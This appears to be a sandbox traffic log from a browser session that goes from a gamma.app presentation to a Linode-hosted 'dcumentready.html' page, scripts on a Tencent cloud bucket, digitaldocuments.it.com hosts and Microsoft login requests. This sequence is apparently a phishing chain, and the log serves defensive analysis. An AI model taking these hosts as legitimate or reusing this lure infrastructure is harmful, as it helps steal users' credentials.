    Source: global trafficHTTP traffic detected: GET /sdk/evalx/61e83cfd8ac5a016e6f0d0b6/contexts/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQifSwid29ya3NwYWNlIjp7ImtleSI6ImFkM3dra2I1bDZvYW8zNyIsIm5hbWUiOiJNSUNIQUVMIEpPSE5TT04ncyBXb3Jrc3BhY2UiLCJwbGFuIjoicHJvIn19?withReasons=true HTTP/1.1Host: app.launchdarkly.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicons/pwa-icon-512x512.png HTTP/1.1Host: gamma.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d; lastReferrer=https://public-usa.mkt.dynamics.com/; firstPageSeen=https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100#card-an1daph37h4un5p; lastPageSeen=https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100#card-an1daph37h4un5p; _dd_s=logs=1&id=e7992cf0-e3e2-4291-be22-30f3dea0956a&created=1742299832803&expire=1742300732803
    Source: global trafficHTTP traffic detected: GET /api/5776661/envelope/?sentry_key=824b9acd00f449f283554475ff8303bb&sentry_version=7&sentry_client=sentry.javascript.nextjs%2F7.8.0 HTTP/1.1Host: o698378.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /eval/61e83cfd8ac5a016e6f0d0b6/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQifSwid29ya3NwYWNlIjp7ImtleSI6ImFkM3dra2I1bDZvYW8zNyIsIm5hbWUiOiJNSUNIQUVMIEpPSE5TT04ncyBXb3Jrc3BhY2UiLCJwbGFuIjoicHJvIn19?withReasons=true HTTP/1.1Host: clientstream.launchdarkly.comConnection: keep-alivesec-ch-ua-platform: "Windows"Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/event-streamsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://gamma.appSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /resize/quality:80/resizing_type:fit/width:2000/https://cdn.gamma.app/ad3wkkb5l6oao37/b0d22c7603704386be6a681832a58090/original/photo_5848101176623614206_y.jpg HTTP/1.1Host: imgproxy.gamma.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d
    Source: global trafficHTTP traffic detected: GET /api/5776661/envelope/?sentry_key=824b9acd00f449f283554475ff8303bb&sentry_version=7&sentry_client=sentry.javascript.nextjs%2F7.8.0 HTTP/1.1Host: o698378.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /frame-modern.a4c0ff37.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vendor-modern.fe3bc4ee.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /api/5776661/envelope/?sentry_key=824b9acd00f449f283554475ff8303bb&sentry_version=7&sentry_client=sentry.javascript.nextjs%2F7.8.0 HTTP/1.1Host: o698378.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /graphql HTTP/1.1Host: api.gamma.appConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://gamma.appSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2dSec-WebSocket-Key: f2Ey+WMCctoNE+HNgeJa+w==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: graphql-ws
    Source: global trafficHTTP traffic detected: GET /api/5776661/envelope/?sentry_key=824b9acd00f449f283554475ff8303bb&sentry_version=7&sentry_client=sentry.javascript.nextjs%2F7.8.0 HTTP/1.1Host: o698378.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /messenger/web/launcher_settings HTTP/1.1Host: api-iam.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pubsub/5-sjmdRj8z5e87rn96ZrsctdtmRKUOcYBeOlEUKoq-NOjSa1OStX28m5ZVJQ_Tk1RWokPmj6xPHZexgSk-TY2tSaOnR7PA3lxyocFP?X-Nexus-New-Client=true&X-Nexus-Version=0.14.0&user_role=visitor HTTP/1.1Host: nexus-websocket-a.intercom.ioConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://gamma.appSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: RJktoV6gP9vDiSmX8BSHQQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
    Source: global trafficHTTP traffic detected: GET /messenger/web/ping HTTP/1.1Host: api-iam.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /dcumentready.html HTTP/1.1Host: dcumentfile.us-southeast-1.linodeobjects.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.2.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://dcumentfile.us-southeast-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dcumentfile.us-southeast-1.linodeobjects.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dcumentfile.us-southeast-1.linodeobjects.com/dcumentready.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /graphql HTTP/1.1Host: api.gamma.appConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://gamma.appSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d; intercom-id-ihnzqaok=d9f0b187-e815-4dc9-91b0-3ad995e61b06; intercom-session-ihnzqaok=; intercom-device-id-ihnzqaok=6f2187ea-1625-44e5-9ef3-687e5e997251Sec-WebSocket-Key: ByyqCCvs0KBiKi1vBeo87A==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: graphql-ws
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: gytqwxqrwvsvqlclcdpq.digitaldocuments.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://dcumentfile.us-southeast-1.linodeobjects.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dcumentfile.us-southeast-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://dcumentfile.us-southeast-1.linodeobjects.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dcumentfile.us-southeast-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://dcumentfile.us-southeast-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://dcumentfile.us-southeast-1.linodeobjects.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dcumentfile.us-southeast-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: office.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: www.office.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /attach%2Fbootstrap.min.js HTTP/1.1Host: 7601613767-1317754460.cos.ap-bangkok.myqcloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://dcumentfile.us-southeast-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638778966462075130.YjYyYTE5NjEtNzNjZC00ZWVjLTlmNWEtZTc0MTQ1ZTliZThlMzA5MzU3YzQtYTcwZi00MGM4LWFiMjItYTdhZjYzYmRmMzNh&ui_locales=en-US&mkt=en-US&client-request-id=93e1aafa-c131-4cd6-a0d3-880abb03e634&state=LprAaNLdv9qrQ_HpSNBFIwg23A3EZq7xqhLsg3F9y4a5FCgOITc7vSQ9FkNAS8aKXgyTAW222JkKqXumtf9KkoHqhw8jU52tGuZmuKF1kQ3O8dyzl_ClDCAy3pmPWbCAEBRGUFF5WCb6etjZVZ1GFovo3ZVgBNZ2Hp3vTXTuDRUpP7GOQg2TsaI0UFfDlnYyUvSjHBF6ylzyZuOUNaZkmzcLvZmmfUFtjPsSZGfJTBkLULMf7OhKGoUx0CvRbBjxOCkjiPYBKfP-w1_3TvibNQ&x-client-SKU=ID_NET8_0&x-client-ver=8.3.0.0 HTTP/1.1Host: login.microsoftonline.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /graphql HTTP/1.1Host: api.gamma.appConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://gamma.appSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d; intercom-id-ihnzqaok=d9f0b187-e815-4dc9-91b0-3ad995e61b06; intercom-session-ihnzqaok=; intercom-device-id-ihnzqaok=6f2187ea-1625-44e5-9ef3-687e5e997251Sec-WebSocket-Key: riXsdnwhZtvcTxLMEPFVyg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: graphql-ws
    Source: global trafficHTTP traffic detected: GET /gh/pranaynamnaik/files@latest/micro-123787483.png HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dcumentfile.us-southeast-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vendors~app~tooltips-modern.aefe08bc.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vendors~app-modern.ea92d9fd.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /app~tooltips-modern.67d65220.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /app-modern.d84b507f.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: wordl.digitaldocuments.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v1/t HTTP/1.1Host: events.api.gamma.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d; intercom-id-ihnzqaok=d9f0b187-e815-4dc9-91b0-3ad995e61b06; intercom-session-ihnzqaok=; intercom-device-id-ihnzqaok=6f2187ea-1625-44e5-9ef3-687e5e997251
